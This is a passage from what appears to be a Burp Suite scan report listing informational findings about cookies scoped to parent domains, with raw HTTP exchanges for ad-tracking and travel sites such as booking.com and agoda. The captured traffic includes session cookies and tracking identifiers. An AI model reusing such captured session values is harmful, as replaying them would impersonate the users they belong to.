13.141. http://u.openx.net/w/1.0/sc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://u.openx.net
Path:   /w/1.0/sc

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /w/1.0/sc?r=http%3A%2F%2Fpsa-d.openx.com%2Fw%2F1.0%2Fajs%3Fauid%3D34591%26res%3D1920x1200x16%26plg%3Dswf%2Csl%2Cqt%2Cwmp%2Cshk%26ch%3DISO-8859-1%26tz%3D300%26r%3Dhttp%253A%2F%2Fad.yieldmanager.com%2Fclk%253F3%252CeAGljN9ugjAUxp-GO9L0n1hDdlHWmRCtmwkbwRuDbR2KUKwsEp9-zTC8wE5Ozvl9J9.5EIlNSYlmlEREQ4YPixgRrOZQzZhiIYzjmEA8R5hG4S1NNBcIpjxZra5b.ldiIVYj-SkY3xaj-mAc3AUA1Dp5H09XyeBk.RckFiXpM8Hv7xFrpOTwSJMpWhToPf-EEm8u6.yr3mRvvcyWF.kK6e68RetM0V2ma5kXqDjXcDM98pcwrPq-CwgP8NK3Br0rtRmA7Uw7AGUbfyyPDnSVNy2dOTpzqwIiKAxw9LCtOWmvohlCXquD51N7M67fu7LVttm3P83BuH1lnPGGi1Xe8QtnK3Hf%252C%26url%3Dhttp%253A%2F%2Fad.yieldmanager.com%2Fiframe3%253FsIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABWlIC2a93RChYjAkZYQYlvVHyaUTyyLANlDidrAAAAAA%253D%253D%252C%252Chttp%25253A%25252F%25252Fd.tradex.openx.com%25252Fafr.php%25253Frefresh%25253D40%252526zoneid%25253D6511%252526cb%25253Dinsert_random_number_here%252526loc%25253D%252CB%25253D10%252526Z%25253D728x90%252526_salt%25253D31903434%252526r%25253D0%252526s%25253D2126909%252C659e43ce-ed51-11e0-8f45-78e7d1f5b944%252C1317599467411%26ref%3Dhttp%253A%2F%2Fad.yieldmanager.com%2Fst%253Fad_type%253Diframe%2526ad_size%253D728x90%2526section%253D2126909%26cb%3D53152720326%26cc%3D1 HTTP/1.1
Host: u.openx.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.yieldmanager.com/iframe3?sIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABWlIC2a93RChYjAkZYQYlvVHyaUTyyLANlDidrAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D728x90%26_salt%3D31903434%26r%3D0%26s%3D2126909,659e43ce-ed51-11e0-8f45-78e7d1f5b944,1317599467411
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=ba6bf0b1-8895-45a9-97a1-53f788c412d7; p=1317599466; i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: i=2b443041-40a6-4c68-9457-0c205483d61d; Version=1; Expires=Mon, 01 Oct 2012 23:54:13 GMT; Max-Age=31536000; Domain=.openx.net; Path=/
Server: MochiWeb/1.1 WebMachine/1.8.1 (participate in the frantic)
P3P: CP="CUR ADM OUR NOR STA NID"
Location: http://psa-d.openx.com/w/1.0/ajs?auid=34591&res=1920x1200x16&plg=swf,sl,qt,wmp,shk&ch=ISO-8859-1&tz=300&r=http%3A//ad.yieldmanager.com/clk%3F3%2CeAGljN9ugjAUxp-GO9L0n1hDdlHWmRCtmwkbwRuDbR2KUKwsEp9-zTC8wE5Ozvl9J9.5EIlNSYlmlEREQ4YPixgRrOZQzZhiIYzjmEA8R5hG4S1NNBcIpjxZra5b.ldiIVYj-SkY3xaj-mAc3AUA1Dp5H09XyeBk.RckFiXpM8Hv7xFrpOTwSJMpWhToPf-EEm8u6.yr3mRvvcyWF.kK6e68RetM0V2ma5kXqDjXcDM98pcwrPq-CwgP8NK3Br0rtRmA7Uw7AGUbfyyPDnSVNy2dOTpzqwIiKAxw9LCtOWmvohlCXquD51N7M67fu7LVttm3P83BuH1lnPGGi1Xe8QtnK3Hf%2C&url=http%3A//ad.yieldmanager.com/iframe3%3FsIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABWlIC2a93RChYjAkZYQYlvVHyaUTyyLANlDidrAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fd.tradex.openx.com%252Fafr.php%253Frefresh%253D40%2526zoneid%253D6511%2526cb%253Dinsert_random_number_here%2526loc%253D%2CB%253D10%2526Z%253D728x90%2526_salt%253D31903434%2526r%253D0%2526s%253D2126909%2C659e43ce-ed51-11e0-8f45-78e7d1f5b944%2C1317599467411&ref=http%3A//ad.yieldmanager.com/st%3Fad_type%3Diframe%26ad_size%3D728x90%26section%3D2126909&cb=53152720326&cc=1&mi=2b443041-40a6-4c68-9457-0c205483d61d&mn=0&mc=1
Date: Sun, 02 Oct 2011 23:54:13 GMT
Content-Length: 0
Connection: close

13.142. http://user.lucidmedia.com/clicksense/user  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://user.lucidmedia.com
Path:   /clicksense/user

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/user?p=a371b4911c4e5b09&r=1 HTTP/1.1
Host: user.lucidmedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26071&s=26072
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=38yalGDMfLj

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:14:34 GMT
Expires: Mon, 03 Oct 2011 00:14:34 GMT
P3P: CP="NOI ADM DEV CUR"
X-Handled-By: awserh24/127.0.0.1
Set-Cookie: 2=38yalGDMfLj; Domain=.lucidmedia.com; Expires=Tue, 02-Oct-2012 00:14:34 GMT; Path=/
Location: http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTc2JnRsPTQzMjAw&piggybackCookie=uid:3620501663059719663
Content-Length: 0
Connection: close

13.143. http://uxm.thousandeyes.com/rest/json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uxm.thousandeyes.com
Path:   /rest/json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rest/json?data={%22aid%22:%2211%22,%22sid%22:%22D5E8C261-B1E7-4A8B-AEEE-A8B3463F3408%22,%22r%22:265892,%22si%22:1,%22url%22:%22http://www.agoda.com/%22,%22ua%22:%22Mozilla/5.0%20(Windows%20NT%206.1;%20WOW64)%20AppleWebKit/535.1%20(KHTML,%20like%20Gecko)%20Chrome/14.0.835.187%20Safari/535.1%22,%22dlt%22:10244,%22clt%22:29183,%22dcl%22:37693,%22lt%22:37694,%22nt%22:0,%22rc%22:0,%22ft%22:2013,%22dt%22:0,%22ct%22:0,%22sct%22:null,%22rqt%22:2006,%22rpt%22:2,%22let%22:1,%22nl%22:1886} HTTP/1.1
Host: uxm.thousandeyes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:40:45 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref='/p3p/p3p.xml', CP='NOI NID HISa OTPa OUR UNRa BUS COM NAV'
Set-Cookie: _uxm_cid=D5E8C261-B1E7-4A8B-AEEE-A8B3463F3408; Domain=.thousandeyes.com; Expires=Tue, 02-Oct-2012 00:40:45 GMT
Vary: Accept-Encoding
Content-Length: 2
Content-Type: text/html

OK
13.144. http://vitamine.networldmedia.net/bts/generic14.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vitamine.networldmedia.net
Path:   /bts/generic14.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bts/generic14.php?cname=nwmhotwire&cvalue=hotelsearch HTTP/1.1
Host: vitamine.networldmedia.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:41:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.9
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR LAW ADM DEV PSA PSD HIS OUR IND UNI"
Set-Cookie: nwmhotwire=hotelsearch; expires=Wed, 02-Nov-2011 00:41:30 GMT; path=/; domain=networldmedia.net
Vary: Accept-Encoding,User-Agent
Content-Length: 43
X-Cnection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
13.145. http://www.agoda.com/partners/partnersearch.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.agoda.com
Path:   /partners/partnersearch.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/partnersearch.aspx?CkInDay=09&CkInMonth=10&CkInYear=2011&CkOutDay=16&CkOutMonth=10&CkOutYear=2011&NumberOfRooms=1&NumberOfAdults=1&NumberOfChildren=0&CityName=&CID=1444075 HTTP/1.1
Host: www.agoda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: /
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: agoda.version.02=CookieId=7523af68-b979-4a5c-9566-6cdf92488e9a&AllocId=7e8ed96e55a1afa44758a9a3548685a805d33aa9e52f062bd12dd4c14f0443858201818dc947029deb77f5ece1dfdd8b53ce5b4bcaab65f1374e65c5c00ce5341e3516961f3b6a770dff9a5728226b6f70b9ec62c57523af68b979a5c5666cdf92488e9a&TItems=2$1444075$10-03-2011 07:38$10-02-2012 07:38$; domain=agoda.com; expires=Wed, 03-Oct-2012 00:38:09 GMT; path=/
Date: Mon, 03 Oct 2011 00:38:08 GMT
Content-Length: 118
Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/">here</a>.</h2>
</body></html>
13.146. http://www.booking.com/general.en-us.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /general.en-us.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /general.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;tmpl=docs/about HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN41dGlG0KbBsKqdlryV2YMpyAycJPmGespKu%2FhvMH%2Bcml0MfZ8A3ADJmd0MPnRSrNRZRaXhMOvd2kmD1ykHQKaTCcYuaNBykbfcIHf7qGipxec1ymPHBj%2BSPuY3eJ2t1gAhSxFt7C%2BXKIWT1%2BF%2BNseMD8tm%2BoBpHmY%2B4G8epSAxtgFe1r%2FZ%2BxYDjuD2NpPo6C9jBeKN0S3X8qZLiL35HDHITVkM52TvKbaTeW4KxHTDD5RUcIueLKTZg0BO87d9%2Fxc9VCRdnjKNerj1geW2DZOmfjBGz9GYJMoCdarKmUVAsnR0iXlxgtoIXiGK6B0iPx0xH19c3KJP%2Fkub96OFhR33o7ZjjY237VztvCv20%2BHP3eevg5x8InAGExRh%2BYDvVr7pMcvgIG%2Biwukv%2Bq9IdotNCKKOLZ6LNaa3MP5RZd4JuSJ7vTwJ1p7wUjgsfT2YbU1xQeOK0dMNLi3JElFSD4F%2FYFW9YiNE7m9wsE1lVwpCtME41Qchw1Vrngk0a1c2nsxR9AK8%2BdGLTXQZIqaX4yxY6u6rDwYTTn9YDLkgj%2FqhC0cwPd3mWQk2TRp7JjCV6QejLIM9ULw05UxEAjMpxK3vPohrcX2dsf%2BWDK0fV7zagYQT75cLLxuOgvaBbz90dOfvgIsFEMSW9sv9%2BxL10EqJVw1joKPhcjSWnExfbMdsPwCTbHfJjKvai8%2BeQjZXTUdImR26CVh6mh94DKTT2raUiRxZ5uqelBYtyq9RuiJ%2BpbscXeCEQqzzhaWnh6i3tUV4WbqEugtNMgyRESMS1MnuJG7QiKCzkPwKX%2B%2Fxf1UUgjxu%2BwiKHptFD3Gm0ZKfZYcSGS6wybLkXfBw3muIaLdnewJ%2BpktRlg%2BNM6RkvzSSrP0W%2FiY7C8yQ7YJO5ly%2FdA4yb2eNrI2eaSdHozvCCCVTHBJhW4MqhZ%2B3nHMhXrSa%2F3pP9dmdho1W%2Br6D5fEJmtuYd6%2BmW2CPKlXnvJE%2BWu%2F3HIBZaTQze6WQZBzPFo1MFb9EaE14fMMVy7QmARBtbNqT5hU3b4gi2RCrc57nrocp6I6V786mK%2FXMTbtzGwruafLcYHsfPiR8bJphP3zeq9fFHeR2PL4RIPEK4qhSIOgu5t%2BRQaCb37oFN1O%2BThaGtxLG5Zx%2BrhnjoX%2BIh6Ugpw0W8qzEURgDkAxaWeVhqSVEFhcUByxRvPZl5ooVeMvflIYStfkx4fo1p7XLfUSIwc1ZSQBCt1Xi7L34Tl7mLvy1OzzWRkNtG2J0U21ZAtpTsV0%2B5WXRMAZHIo8j3YhZPe6Sy58aUCfgQu%2FHDYDHxKLTRS%2F3hToUO2lIaqTSxxDxjZiwuWpTRETXxHgk6R0Zm5X3xC2768YFIzCnCh%2FFYvpX4Ydn8FeRl9mompZttcmHllz%2FCH2TKO3pA%3D%3D; __utma=1.1339354214.1317600621.1317603252.1317603725.3; __utmb=1.6.9.1317605413177; __utmc=1; __utmz=1.1317603725.3.3.utmcsr=tripad|utmccn=(not%20set)|utmcmd=SPPC|utmctr=hotel-59554|utmcct=text-cr; BJS=-; ramala=5.31764388084412

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:31:15 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YUFsPGDw%2F3YvsmbEMnpK9%2F5N%2B025mTgFVBfR64%2FgKzgcZwS2BG%2FpVqxxgeiiGa2Aij6eAdFCIoFktHJRCU7t6pG8eYurfp1mo97MaE6Xt3SQiUpot4wcm%2Ful3h2cCp3Aq3v9fFndje7J5kBuXpqwKFwzq1d8NFsqOMXkMLOh8MheA4SvhsDED1JW8Lzq1pPPuNWkLtLa2nYu4GrPir7OHtXIl44wyZZqW%2BoUI25Qt%2Bq%2FThnN11dNMvpllwZf%2BFUGaF0yEYQWfEUxqgLGBTcGCbPL2PoJSvzs3aJcz6peq6OJcz0X3v8XJzxlrl3Re%2B4fMPNVGOKw3OXRjD9BApu3kdB%2B4DfNedCdH7nvJIk8bHMsdAXvWaipTAaEEr77iSzcDzu0k4Pb0VGYDgJMguGhKAboI9qdT5%2FfoxQD1ZO10v0YKUwppRIyD0a3Ln9PUrxwZkhSSkHFlrAVjent8lv1qDG2xdp9lmPdV5vh3rRmuN1Lz0QN%2F3V2Sn9fPeJsHrK0pcgOYpSyW0n95GoFoyAkBhI17Phwo7yrvrjeDNHmxKMRkraR5MdqFJBuwCVd9dBvXoVyxW413W13jwOQsaHZx8iPdphluzMD5h3jwOEjlDkBpFkAF0kJZnoHDtUP3l1iRU%2FdEKfImnJ%2FQISsSKIW2wR5lSf%2F1SximqCADYBfEBvNs%2Bb4p%2BXQ0a42SQI1HuZMn7XZ3eadU1vaR0aacQEhT%2BTMbKt5QCA48TalbFf5k5egYBg9r%2B4N8uoiUgQQYx%2Ftt5AO9%2FVBRh7aJptr3L4saF02KTAh9Z0p5%2Fihhjlsn4hE28vhAsssqhO3O8S8giS%2BAD9yLu1raMti3QMcj0gfOfbUXo26HhPHD3cS56Ly4PlQzJm6UrwqCaLpO7KTYRTBFNfjq%2FicOkR6pMNZ1%2FC%2Fc0eZGJAjprFnEfcz%2Ff1D2udPGhpbVYLpVeRCyKbNt53ggYIGQr1TTkJ7xhSCCOCzTUXuE6dUGpUiWBZ7%2F3AHIMw6FvtaQBTat%2FQXE6ame41kAL%2B6V00yN0Xmopzv5yDpjigEcOO5oIMkGwsHdniwwtzhwSITaOyh2%2FKP0tbPU%2FCeKxA16ayEzJ5YKOenV4WVCjaYstXg3Le9A%2B%2BgxuR7X2ojY6dDXatodt%2F5RDf3maagBIdR6Oc6ZIKCZVYQTZjElDDZ8cp%2FgiTlLo6jDqUUyssnkr6X3M%2FAjD%2BrZNH8IuQKQM72Zu1cjPHJxdgPqO%2BOs%2F7rRh9o%2FTf5CKOGhXuc0PdC22WNwtICZpDHs8KyH%2F%2FopDWQBPuGzYzztul5MGNxkOl4zCU0jr3252eba8xA1Mw3aePG1Sf%2F8UQEgao7bg13Co2dpibytVWXIz1SXqF3vHV2vONIMhbOr0HejT8ddOxSgNDag0VIm1OAYgAbMxdRRA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:31:16 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 59658
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
13.147. http://www.booking.com/hotel/us/c-boston-massachusettes.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:14 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YbKxbV%2FMJ74mwWA2qRP9ibjLlGSkGnixIN53jQSEFpZ%2Btt%2FEJbWxCwnNo9PFCYgujcC5zr%2FNnG2SXj%2FlwkxJh0Rlt6OoCAfAXC3G1Glp4pwRM49T3YD64Tefl5B%2BA6FojZRWNPqfRuwCMgCSmHsFJeZKeepvzYPcawzb3ElmfM8U3kB%2B0xUq4ewe4gLbFQ0okcCs2oila3oQmChJIOFelhvhIn3j4XqTiKyB%2BzNUZJLBDJC9FMQQsn%2F99mmnY3TlC%2FB6EQg2nU50Pd4t5idoU7FR6PL8ulD098rM8qIHr2I0DBfTZZ1JTx2qAEhooN7rqEfROrFcBxEYba%2FtDUB7St7FdNyKXMz4h1eh9eWzHmGeQIFzoBcbrv7%2FOlyH18uHrrwywNNBs%2B6CPYsZxHSrLNYNkA3p54cJwVJJtADgBE9vkTKuoaRbmXXXYcQ86rDIbGJUCDA2j0x8fpuMDPY2mQ%2BCdx%2FNusXDhxf%2BA0ZMhno3cUHHRqbWpereTJlY2vVu5h1Y2q7Cfi6ApwJWDv%2BfuO98fIM%2Fhu%2FX%2B0SLvl%2B%2Fjx1LGZc1US2Gz1ZieDavXXvciTa6rXmIm2%2FdKvW7s4q2AwZtOX30qxBGshCyJgjKtgjiMCxDyxFVdf7EcVq4JTOguZfxVqHRR%2B%2Fcy%2BSAsTRg9zqx%2FtST2kRIticJJiOXs6ArJfMau9s79Jc%2FA8jvUPg%2F2bBTHy7Yjm1PE3illu56a6dgj0n1%2Fyb0UCfVwE5jRsU%2BKkT7s7cUmVhAVhZ9usxmGKlwYdTA2rY%2FaI9lxsClMjpiDXHCWmXJc2FaVspfJMjtvDmIanyPF9zgnyRRAeWeq73NdAIQVD9Zkcn0w3u78GbuMZtBlzzxK9usz%2BTZzzq0pw5svZbpRvL0MkGkwvD7cMgq0i%2F6a1NX3K1Ch4yWCS%2BHLRvlcSHdTUywk0u%2B0xmqD2%2Bxg8uxhsE1%2FdvBw93mjrIZu5AP3L4MmqoA9edCGGVPgqIJBf01YcyckRX0%2F0cTNB3u%2Bl5Ype%2FywAfb%2Fa8awDp9BWNKgj%2B6EqGsglDnmUWQN3JweXVWhgzBOpzywYIa2d4nWm0alm9aDppC34Dcx8P7tuThuOduYpc1bkAp%2FVnuVGE9T8ESzu%2B9adrUWruCp%2BLpAUvAIiGYGNFTgEAiQCQ8xz2aIjBa1urHpuk2GZtYTUi4j5ROFYT4DXZ1IAVCPuvuTFnqiS2HnjKi4xJXmNmkg8rBg9xWoDZ%2BH0wwqRX4iZWOY3i5iNEwebqtaoie%2BP7r6G%2FLQUM7pXZ4w0OMpQMyQi%2FVFaQETCe9980e9NIYR8OQkNVLofepzbE1hCbxXn6Q0kJJKpE%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:02:15 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232378
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
13.148. http://www.booking.com/hotel/us/copley-square.en-us.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
